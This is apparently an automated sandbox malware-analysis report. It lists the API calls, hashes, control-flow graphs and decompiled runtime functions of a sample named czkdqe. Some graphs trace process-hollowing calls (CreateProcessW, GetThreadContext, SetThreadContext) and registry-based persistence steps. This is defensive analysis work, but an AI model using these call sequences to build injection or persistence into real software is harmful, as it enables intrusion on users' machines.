                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocNumaVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4233825816-0
                                                                                    • Opcode ID: 3c414148d26da7dfe7238f6202e40c66060042b6c53b8128516a935c15da37ef
                                                                                    • Instruction ID: b95dd860ba23a36ee3c0794ca7f484ff40f79e44e8c19acd7b1f9e07544c89b0
                                                                                    • Opcode Fuzzy Hash: 3c414148d26da7dfe7238f6202e40c66060042b6c53b8128516a935c15da37ef
                                                                                    • Instruction Fuzzy Hash: 7C42B710D5D2D8ADDF12CBE994157FCBFB09F26201F1845CAE1E4E6283D13A878ADB25
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 527 590ebf-590f05 call 59005f call 590073 GetSystemInfo 533 590f0e 527->533 534 590f07-590f0a 527->534 535 590f10-590f13 533->535 534->535
                                                                                    APIs
                                                                                    • GetSystemInfo.KERNELBASE(?), ref: 00590EDC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 31276548-0
                                                                                    • Opcode ID: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                                                                                    • Instruction ID: 50aa248e97c15493c5e00324797d3f5d0b571be2ce5ca816fa8fca2b286dafed
                                                                                    • Opcode Fuzzy Hash: d69ba95a622c894a4bd645ab8dbcca4bac2886ff4769df9fa958ec880ce194c4
                                                                                    • Instruction Fuzzy Hash: BBF0A772D1410CAFDF58E6B8894DABF7BBCE748300F104969E606D2180D53486404664
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,00591FE8,7FAB7E30), ref: 00591818
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00591FE8,7FAB7E30,00591CA6,00000000,00000040), ref: 00591842
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,00591FE8,7FAB7E30,00591CA6,00000000), ref: 00591859
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,00591FE8,7FAB7E30,00591CA6,00000000,00000040), ref: 0059187B
                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,00591FE8,7FAB7E30,00591CA6,00000000,00000040,?,00000000,0000000E), ref: 005918ED
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00591FE8,7FAB7E30,00591CA6,00000000,00000040,?), ref: 005918F8
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,00591FE8,7FAB7E30,00591CA6,00000000,00000040,?), ref: 00591943
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                    • String ID:
                                                                                    • API String ID: 656311269-0
                                                                                    • Opcode ID: a4978228675636b1041a9a845439245fe07010a0cf936575b77ea44cb26eb9a7
                                                                                    • Instruction ID: 72d5c42e709c1ebb8db8aa83fa55f6dd7cb2fff177195b186c8785903509229b
                                                                                    • Opcode Fuzzy Hash: a4978228675636b1041a9a845439245fe07010a0cf936575b77ea44cb26eb9a7
                                                                                    • Instruction Fuzzy Hash: 9051A071E0071AABDF209FB4DC98BAEBBB9BF45710F144915F941FB280D7749A008B68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 98 59020a-5902e6 call 59005f call 590073 * 8 PathFileExistsW 118 5902ec-590307 CreateFileW 98->118 119 590373-590379 98->119 120 590309-59030b 118->120 121 59030d-590316 118->121 120->119 121->120 123 590318-59032c VirtualAlloc 121->123 123->120 124 59032e-59033b ReadFile 123->124 124->120 125 59033d-590368 FindCloseChangeNotification CreateFileW WriteFile 124->125 126 59036a-59036c 125->126 127 59036d-590371 125->127 126->127 127->119
                                                                                    APIs
                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 005902E1
                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005902FF
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00590324
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00590336
                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0059033E
                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000007,00000000,00000001,00000080,00000000), ref: 00590354
                                                                                    • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00590363
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Create$AllocChangeCloseExistsFindNotificationPathReadVirtualWrite
                                                                                    • String ID:
                                                                                    • API String ID: 2600930906-0
                                                                                    • Opcode ID: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                                                                                    • Instruction ID: 5df507d9c47b30dab0b49e87f2ce0ccea79bc2b02bfcd75defd650dfb84de22e
                                                                                    • Opcode Fuzzy Hash: e8af375a62a67367dd6a7673c85b47b54d02db1bab8b56e9b7736464bc87bfa5
                                                                                    • Instruction Fuzzy Hash: 3C415B75A00209BEEF10ABF4AC59FBFBA78EF44750F10591AF910F7190E7748A008769
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 129 5908ef-59090a call 59005f 132 59090d-590911 129->132 133 590929-590936 132->133 134 590913-590927 132->134 135 590939-59093d 133->135 134->132 136 59093f-590953 135->136 137 590955-590962 135->137 136->135 138 590965-590969 137->138 139 59096b-59097f 138->139 140 590981-590a5f call 590073 * 8 138->140 139->138 157 590a61-590a6b 140->157 158 590a76 140->158 157->158 159 590a6d-590a74 157->159 160 590a7a-590a96 158->160 159->160 162 590a98-590a9a 160->162 163 590a9f 160->163 165 590e19-590e1c 162->165 164 590aa6-590ace CreateProcessW 163->164 166 590ad0 164->166 167 590ad5-590aee GetThreadContext 164->167 168 590dcd-590dd1 166->168 169 590af0 167->169 170 590af5-590b12 ReadProcessMemory 167->170 173 590dd3-590dd7 168->173 174 590e16-590e18 168->174 169->168 171 590b19-590b22 170->171 172 590b14 170->172 175 590b49-590b68 call 591b98 171->175 176 590b24-590b33 171->176 172->168 177 590dd9-590de4 173->177 178 590dea-590dee 173->178 174->165 191 590b6a 175->191 192 590b6f-590b90 call 591cb2 175->192 176->175 181 590b35-590b3b call 591b03 176->181 177->178 179 590df0 178->179 180 590df6-590dfa 178->180 179->180 183 590dfc 180->183 184 590e02-590e06 180->184 190 590b40-590b42 181->190 183->184 188 590e08-590e0d call 591b03 184->188 189 590e12-590e14 184->189 188->189 189->165 190->175 195 590b44 190->195 191->168 197 590b92-590b99 192->197 198 590bd5-590bf5 call 591cb2 192->198 195->168 199 590b9b-590bc7 call 591cb2 197->199 200 590bd0 197->200 205 590bfc-590c11 call 5900da 198->205 206 590bf7 198->206 207 590bc9 199->207 208 590bce 199->208 200->168 211 590c1a-590c24 205->211 206->168 207->168 208->198 212 590c56-590c5a 211->212 213 590c26-590c54 call 5900da 211->213 215 590d3a-590d56 call 591951 212->215 216 590c60-590c6e 212->216 213->211 223 590d58 215->223 224 590d5a-590d7b SetThreadContext 215->224 216->215 219 590c74-590c82 216->219 219->215 222 590c88-590ca8 219->222 225 590cab-590caf 222->225 223->168 226 590d7d 224->226 227 590d7f-590d89 call 591a52 224->227 225->215 228 590cb5-590cca 225->228 226->168 234 590d8b 227->234 235 590d8d-590d91 227->235 230 590cdc-590ce0 228->230 232 590d1d-590d35 230->232 233 590ce2-590cee 230->233 232->225 236 590d1b 233->236 237 590cf0-590d19 233->237 234->168 239 590d99-590d9d 235->239 240 590d93 235->240 236->230 237->236 241 590d9f 239->241 242 590da5-590da9 239->242 240->239 241->242 243 590dab 242->243 244 590db1-590db5 242->244 243->244 245 590dc1-590dc7 244->245 246 590db7-590dbc call 591b03 244->246 245->164 245->168 246->245
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: D
                                                                                    • API String ID: 0-2746444292
                                                                                    • Opcode ID: 816c0917f3bf0678a23910bf4dabc68dcaf0c0323beeddfbbeb6261f19545be3
                                                                                    • Instruction ID: 0347559cfa93be9f6ebf7140f0e1ded3d750470699b1f3af8ab6611fc5b935dd
                                                                                    • Opcode Fuzzy Hash: 816c0917f3bf0678a23910bf4dabc68dcaf0c0323beeddfbbeb6261f19545be3
                                                                                    • Instruction Fuzzy Hash: E202EF70E00219EFEF14CF94CD89BADBBB5BF08305F245869E515AA2A1D774AE80DF14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 248 402b6b-402b87 249 402ba3 248->249 250 402b89-402b8d 248->250 252 402ba5-402ba9 249->252 250->249 251 402b8f-402b91 250->251 253 402b93-402b98 call 40370a 251->253 254 402baa-402baf 251->254 266 402b9e call 4036b8 253->266 256 402bb1-402bbb 254->256 257 402bbd-402bc0 254->257 256->257 258 402bde-402bee 256->258 259 402bc2-402bcb call 4031b0 257->259 260 402bce-402bd0 257->260 264 402bf0-402bf6 258->264 265 402bf8 258->265 259->260 260->253 263 402bd2-402bdc 260->263 263->253 263->258 268 402bff-402c01 264->268 265->268 266->249 270 402ce1-402ce4 268->270 271 402c07-402c0e 268->271 270->252 272 402c10-402c15 271->272 273 402c54-402c57 271->273 272->273 276 402c17 272->276 274 402cb5-402cb6 call 404f6e 273->274 275 402c59-402c5d 273->275 283 402cbb-402cbf 274->283 278 402c7e-402c85 275->278 279 402c5f-402c68 275->279 280 402c1d-402c21 276->280 281 402d0f 276->281 286 402c87 278->286 287 402c89-402c8c 278->287 284 402c73-402c78 279->284 285 402c6a-402c71 279->285 288 402c23 280->288 289 402c25-402c28 280->289 282 402d13-402d1c 281->282 282->252 283->282 292 402cc1-402cc5 283->292 293 402c7a-402c7c 284->293 285->293 286->287 290 402ce9-402ced 287->290 294 402c8e-402c9a call 40573d call 405647 287->294 288->289 289->290 291 402c2e-402c4f call 405763 289->291 297 402cff-402d0a call 40370a 290->297 298 402cef-402cfc call 4031b0 290->298 301 402cd9-402cdb 291->301 292->290 296 402cc7-402cd6 292->296 293->287 308 402c9f-402ca4 294->308 296->301 297->266 298->297 301->270 301->271 309 402d21-402d25 308->309 310 402ca6-402ca9 308->310 309->282 310->281 311 402cab-402cb3 310->311 311->301
                                                                                    C-Code - Quality: 97%
                                                                                    			E00402B6B(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                                                    				signed int _v8;
                                                                                    				char* _v12;
                                                                                    				signed int _v16;
                                                                                    				signed int _v20;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				signed int _t82;
                                                                                    				char _t89;
                                                                                    				signed int _t96;
                                                                                    				signed int _t98;
                                                                                    				signed int _t101;
                                                                                    				signed int _t104;
                                                                                    				signed int _t108;
                                                                                    				signed int _t109;
                                                                                    				char* _t110;
                                                                                    				signed int _t120;
                                                                                    				signed int _t123;
                                                                                    				signed int _t124;
                                                                                    				signed int _t125;
                                                                                    				signed int _t126;
                                                                                    				void* _t127;
                                                                                    
                                                                                    				_t110 = _a4;
                                                                                    				_t108 = _a8;
                                                                                    				_t123 = _a12;
                                                                                    				_v12 = _t110;
                                                                                    				_v8 = _t108;
                                                                                    				if(_t123 == 0 || _a16 == 0) {
                                                                                    					L5:
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					_t131 = _t110;
                                                                                    					if(_t110 != 0) {
                                                                                    						_t126 = _a20;
                                                                                    						__eflags = _t126;
                                                                                    						if(_t126 == 0) {
                                                                                    							L9:
                                                                                    							__eflags = _t108 - 0xffffffff;
                                                                                    							if(_t108 != 0xffffffff) {
                                                                                    								_t82 = E004031B0(_t110, 0, _t108);
                                                                                    								_t127 = _t127 + 0xc;
                                                                                    							}
                                                                                    							__eflags = _t126;
                                                                                    							if(__eflags == 0) {
                                                                                    								goto L3;
                                                                                    							} else {
                                                                                    								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                                                                                    								if(__eflags > 0) {
                                                                                    									goto L3;
                                                                                    								}
                                                                                    								L13:
                                                                                    								_t124 = _t123 * _a16;
                                                                                    								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                                                                    								_v20 = _t124;
                                                                                    								_t109 = _t124;
                                                                                    								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                                                                    									_v16 = 0x1000;
                                                                                    								} else {
                                                                                    									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                    								}
                                                                                    								__eflags = _t124;
                                                                                    								if(_t124 == 0) {
                                                                                    									L40:
                                                                                    									return _a16;
                                                                                    								} else {
                                                                                    									do {
                                                                                    										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                                                                    										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                                                                    											L24:
                                                                                    											__eflags = _t109 - _v16;
                                                                                    											if(_t109 < _v16) {
                                                                                    												_t89 = E00404F6E(_t109, _t124, _t126); // executed
                                                                                    												__eflags = _t89 - 0xffffffff;
                                                                                    												if(_t89 == 0xffffffff) {
                                                                                    													L45:
                                                                                    													return (_t124 - _t109) / _a12;
                                                                                    												}
                                                                                    												__eflags = _v8;
                                                                                    												if(_v8 == 0) {
                                                                                    													L41:
                                                                                    													__eflags = _a8 - 0xffffffff;
                                                                                    													if(__eflags != 0) {
                                                                                    														E004031B0(_a4, 0, _a8);
                                                                                    													}
                                                                                    													 *((intOrPtr*)(E0040370A(__eflags))) = 0x22;
                                                                                    													L4:
                                                                                    													E004036B8();
                                                                                    													goto L5;
                                                                                    												}
                                                                                    												_v12 = _v12 + 1;
                                                                                    												 *_v12 = _t89;
                                                                                    												_t109 = _t109 - 1;
                                                                                    												_t65 =  &_v8;
                                                                                    												 *_t65 = _v8 - 1;
                                                                                    												__eflags =  *_t65;
                                                                                    												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                    												goto L39;
                                                                                    											}
                                                                                    											__eflags = _v16;
                                                                                    											if(_v16 == 0) {
                                                                                    												_t96 = 0x7fffffff;
                                                                                    												__eflags = _t109 - 0x7fffffff;
                                                                                    												if(_t109 <= 0x7fffffff) {
                                                                                    													_t96 = _t109;
                                                                                    												}
                                                                                    											} else {
                                                                                    												__eflags = _t109 - 0x7fffffff;
                                                                                    												if(_t109 <= 0x7fffffff) {
                                                                                    													_t50 = _t109 % _v16;
                                                                                    													__eflags = _t50;
                                                                                    													_t120 = _t50;
                                                                                    													_t101 = _t109;
                                                                                    												} else {
                                                                                    													_t120 = 0x7fffffff % _v16;
                                                                                    													_t101 = 0x7fffffff;
                                                                                    												}
                                                                                    												_t96 = _t101 - _t120;
                                                                                    											}
                                                                                    											__eflags = _t96 - _v8;
                                                                                    											if(_t96 > _v8) {
                                                                                    												goto L41;
                                                                                    											} else {
                                                                                    												_push(_t96);
                                                                                    												_push(_v12);
                                                                                    												_push(E0040573D(_t126)); // executed
                                                                                    												_t98 = E00405647(_t109, _t124, _t126, __eflags); // executed
                                                                                    												_t127 = _t127 + 0xc;
                                                                                    												__eflags = _t98;
                                                                                    												if(_t98 == 0) {
                                                                                    													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                                                                                    													goto L45;
                                                                                    												}
                                                                                    												__eflags = _t98 - 0xffffffff;
                                                                                    												if(_t98 == 0xffffffff) {
                                                                                    													L44:
                                                                                    													_t72 = _t126 + 0xc;
                                                                                    													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                                                                                    													__eflags =  *_t72;
                                                                                    													goto L45;
                                                                                    												}
                                                                                    												_v12 = _v12 + _t98;
                                                                                    												_t109 = _t109 - _t98;
                                                                                    												_v8 = _v8 - _t98;
                                                                                    												goto L39;
                                                                                    											}
                                                                                    										}
                                                                                    										_t104 =  *(_t126 + 4);
                                                                                    										__eflags = _t104;
                                                                                    										if(__eflags == 0) {
                                                                                    											goto L24;
                                                                                    										}
                                                                                    										if(__eflags < 0) {
                                                                                    											goto L44;
                                                                                    										}
                                                                                    										_t125 = _t109;
                                                                                    										__eflags = _t109 - _t104;
                                                                                    										if(_t109 >= _t104) {
                                                                                    											_t125 = _t104;
                                                                                    										}
                                                                                    										__eflags = _t125 - _v8;
                                                                                    										if(_t125 > _v8) {
                                                                                    											goto L41;
                                                                                    										} else {
                                                                                    											E00405763(_v12, _v8,  *_t126, _t125);
                                                                                    											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                                                                                    											 *_t126 =  *_t126 + _t125;
                                                                                    											_v12 = _v12 + _t125;
                                                                                    											_t109 = _t109 - _t125;
                                                                                    											_t127 = _t127 + 0x10;
                                                                                    											_v8 = _v8 - _t125;
                                                                                    											_t124 = _v20;
                                                                                    										}
                                                                                    										L39:
                                                                                    										__eflags = _t109;
                                                                                    									} while (_t109 != 0);
                                                                                    									goto L40;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						_t82 = (_t82 | 0xffffffff) / _t123;
                                                                                    						__eflags = _a16 - _t82;
                                                                                    						if(_a16 <= _t82) {
                                                                                    							goto L13;
                                                                                    						}
                                                                                    						goto L9;
                                                                                    					}
                                                                                    					L3:
                                                                                    					 *((intOrPtr*)(E0040370A(_t131))) = 0x16;
                                                                                    					goto L4;
                                                                                    				}
                                                                                    			}


























                                                                                    0x00402b73
                                                                                    0x00402b77
                                                                                    0x00402b7c
                                                                                    0x00402b7f
                                                                                    0x00402b82
                                                                                    0x00402b87
                                                                                    0x00402ba3
                                                                                    0x00000000
                                                                                    0x00402b8f
                                                                                    0x00402b8f
                                                                                    0x00402b91
                                                                                    0x00402baa
                                                                                    0x00402bad
                                                                                    0x00402baf
                                                                                    0x00402bbd
                                                                                    0x00402bbd
                                                                                    0x00402bc0
                                                                                    0x00402bc6
                                                                                    0x00402bcb
                                                                                    0x00402bcb
                                                                                    0x00402bce
                                                                                    0x00402bd0
                                                                                    0x00000000
                                                                                    0x00402bd2
                                                                                    0x00402bd9
                                                                                    0x00402bdc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402bde
                                                                                    0x00402bde
                                                                                    0x00402be2
                                                                                    0x00402be9
                                                                                    0x00402bec
                                                                                    0x00402bee
                                                                                    0x00402bf8
                                                                                    0x00402bf0
                                                                                    0x00402bf3
                                                                                    0x00402bf3
                                                                                    0x00402bff
                                                                                    0x00402c01
                                                                                    0x00402ce1
                                                                                    0x00000000
                                                                                    0x00402c07
                                                                                    0x00402c07
                                                                                    0x00402c07
                                                                                    0x00402c0e
                                                                                    0x00402c54
                                                                                    0x00402c54
                                                                                    0x00402c57
                                                                                    0x00402cb6
                                                                                    0x00402cbc
                                                                                    0x00402cbf
                                                                                    0x00402d13
                                                                                    0x00000000
                                                                                    0x00402d19
                                                                                    0x00402cc1
                                                                                    0x00402cc5
                                                                                    0x00402ce9
                                                                                    0x00402ce9
                                                                                    0x00402ced
                                                                                    0x00402cf7
                                                                                    0x00402cfc
                                                                                    0x00402d04
                                                                                    0x00402b9e
                                                                                    0x00402b9e
                                                                                    0x00000000
                                                                                    0x00402b9e
                                                                                    0x00402cca
                                                                                    0x00402ccd
                                                                                    0x00402cd2
                                                                                    0x00402cd3
                                                                                    0x00402cd3
                                                                                    0x00402cd3
                                                                                    0x00402cd6
                                                                                    0x00000000
                                                                                    0x00402cd6
                                                                                    0x00402c59
                                                                                    0x00402c5d
                                                                                    0x00402c7e
                                                                                    0x00402c83
                                                                                    0x00402c85
                                                                                    0x00402c87
                                                                                    0x00402c87
                                                                                    0x00402c5f
                                                                                    0x00402c66
                                                                                    0x00402c68
                                                                                    0x00402c75
                                                                                    0x00402c75
                                                                                    0x00402c75
                                                                                    0x00402c78
                                                                                    0x00402c6a
                                                                                    0x00402c6c
                                                                                    0x00402c6f
                                                                                    0x00402c6f
                                                                                    0x00402c7a
                                                                                    0x00402c7a
                                                                                    0x00402c89
                                                                                    0x00402c8c
                                                                                    0x00000000
                                                                                    0x00402c8e
                                                                                    0x00402c8e
                                                                                    0x00402c8f
                                                                                    0x00402c99
                                                                                    0x00402c9a
                                                                                    0x00402c9f
                                                                                    0x00402ca2
                                                                                    0x00402ca4
                                                                                    0x00402d21
                                                                                    0x00000000
                                                                                    0x00402d21
                                                                                    0x00402ca6
                                                                                    0x00402ca9
                                                                                    0x00402d0f
                                                                                    0x00402d0f
                                                                                    0x00402d0f
                                                                                    0x00402d0f
                                                                                    0x00000000
                                                                                    0x00402d0f
                                                                                    0x00402cab
                                                                                    0x00402cae
                                                                                    0x00402cb0
                                                                                    0x00000000
                                                                                    0x00402cb0
                                                                                    0x00402c8c
                                                                                    0x00402c10
                                                                                    0x00402c13
                                                                                    0x00402c15
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402c17
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402c1d
                                                                                    0x00402c1f
                                                                                    0x00402c21
                                                                                    0x00402c23
                                                                                    0x00402c23
                                                                                    0x00402c25
                                                                                    0x00402c28
                                                                                    0x00000000
                                                                                    0x00402c2e
                                                                                    0x00402c37
                                                                                    0x00402c3c
                                                                                    0x00402c3f
                                                                                    0x00402c41
                                                                                    0x00402c44
                                                                                    0x00402c46
                                                                                    0x00402c49
                                                                                    0x00402c4c
                                                                                    0x00402c4c
                                                                                    0x00402cd9
                                                                                    0x00402cd9
                                                                                    0x00402cd9
                                                                                    0x00000000
                                                                                    0x00402c07
                                                                                    0x00402c01
                                                                                    0x00402bd0
                                                                                    0x00402bb6
                                                                                    0x00402bb8
                                                                                    0x00402bbb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00402bbb
                                                                                    0x00402b93
                                                                                    0x00402b98
                                                                                    0x00000000
                                                                                    0x00402b98

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 4048096073-0
                                                                                    • Opcode ID: 3e55330ef25e11bda9666754cb977c4305d767178d4fee68403ec20e4c83b188
                                                                                    • Instruction ID: abacd86320d5ed1a29450df115b8c4d9fa12e2f409c427afaea6b8449eeccf7a
                                                                                    • Opcode Fuzzy Hash: 3e55330ef25e11bda9666754cb977c4305d767178d4fee68403ec20e4c83b188
                                                                                    • Instruction Fuzzy Hash: AB51F930A00205EBDB249F698A4865FB7B1EF40320F24827BE821772D0D7B9DE41DF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 352 407055-407064 GetEnvironmentStringsW 353 407066-407069 352->353 354 40706a-40706d 352->354 355 40707f-407087 call 408bfa 354->355 356 40706f-407075 354->356 359 40708c-407091 355->359 356->356 357 407077-40707d 356->357 357->355 357->356 360 4070a0-4070ab call 409de0 359->360 361 407093-40709f FreeEnvironmentStringsW 359->361 360->361
                                                                                    C-Code - Quality: 100%
                                                                                    			E00407055() {
                                                                                    				WCHAR* _t2;
                                                                                    				void* _t4;
                                                                                    				void* _t15;
                                                                                    				WCHAR* _t17;
                                                                                    
                                                                                    				_t2 = GetEnvironmentStringsW();
                                                                                    				_t17 = _t2;
                                                                                    				if(_t17 != 0) {
                                                                                    					if( *_t17 != 0) {
                                                                                    						goto L3;
                                                                                    						do {
                                                                                    							do {
                                                                                    								L3:
                                                                                    								_t2 =  &(_t2[1]);
                                                                                    							} while ( *_t2 != 0);
                                                                                    							_t2 =  &(_t2[1]);
                                                                                    						} while ( *_t2 != 0);
                                                                                    					}
                                                                                    					_t1 = _t2 - _t17 + 2; // -2
                                                                                    					_t10 = _t1;
                                                                                    					_t4 = E00408BFA(_t1); // executed
                                                                                    					_t15 = _t4;
                                                                                    					if(_t15 != 0) {
                                                                                    						E00409DE0(_t15, _t17, _t10);
                                                                                    					}
                                                                                    					FreeEnvironmentStringsW(_t17);
                                                                                    					return _t15;
                                                                                    				} else {
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}







                                                                                    0x00407058
                                                                                    0x0040705e
                                                                                    0x00407064
                                                                                    0x0040706d
                                                                                    0x00000000
                                                                                    0x0040706f
                                                                                    0x0040706f
                                                                                    0x0040706f
                                                                                    0x0040706f
                                                                                    0x00407072
                                                                                    0x00407077
                                                                                    0x0040707a
                                                                                    0x0040706f
                                                                                    0x00407082
                                                                                    0x00407082
                                                                                    0x00407087
                                                                                    0x0040708c
                                                                                    0x00407091
                                                                                    0x004070a3
                                                                                    0x004070a8
                                                                                    0x00407094
                                                                                    0x0040709f
                                                                                    0x00407066
                                                                                    0x00407069
                                                                                    0x00407069

                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,00403312), ref: 00407058
                                                                                    • __malloc_crt.LIBCMT ref: 00407087
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00407094
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                    • String ID:
                                                                                    • API String ID: 237123855-0
                                                                                    • Opcode ID: 35615fc54d2ac24f28e300269086089307abffb33a8936016d094c2736e6faa0
                                                                                    • Instruction ID: a157651967c13172b9dd03f83ae22e2c4aa92d1ff81e8b70bdfe45de40c08460
                                                                                    • Opcode Fuzzy Hash: 35615fc54d2ac24f28e300269086089307abffb33a8936016d094c2736e6faa0
                                                                                    • Instruction Fuzzy Hash: BFF02E77D080116ACB317735BC5589B2728CAD5364306813BF406F3382F938AD81C2AA
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 364 590422-59077a call 59005f call 590073 * 13 399 59077e-590784 364->399 399->399 400 590786-59079c 399->400 402 5907a2-5907b0 400->402 403 5908e4 400->403 402->403 406 5907b6-5907d8 402->406 404 5908e6-5908ec 403->404 406->403 409 5907de-5907f5 406->409 409->403 411 5907fb-590811 409->411 413 590823-590831 call 59037c 411->413 414 590813-59081e 411->414 413->403 418 590837-59084c call 59020a 413->418 414->404 418->403 421 590852-590858 418->421 422 59085e-590879 RegGetValueW 421->422 422->403 423 59087b-590895 RegOpenKeyExW 422->423 423->422 424 590897-5908d7 RegSetValueExW 423->424 424->403 428 5908d9-5908e2 424->428 428->404
                                                                                    APIs
                                                                                      • Part of subcall function 0059037C: PathFileExistsW.KERNELBASE(?), ref: 00590406
                                                                                      • Part of subcall function 0059037C: CreateDirectoryW.KERNELBASE(?,00000000), ref: 00590412
                                                                                      • Part of subcall function 0059020A: PathFileExistsW.KERNELBASE(?), ref: 005902E1
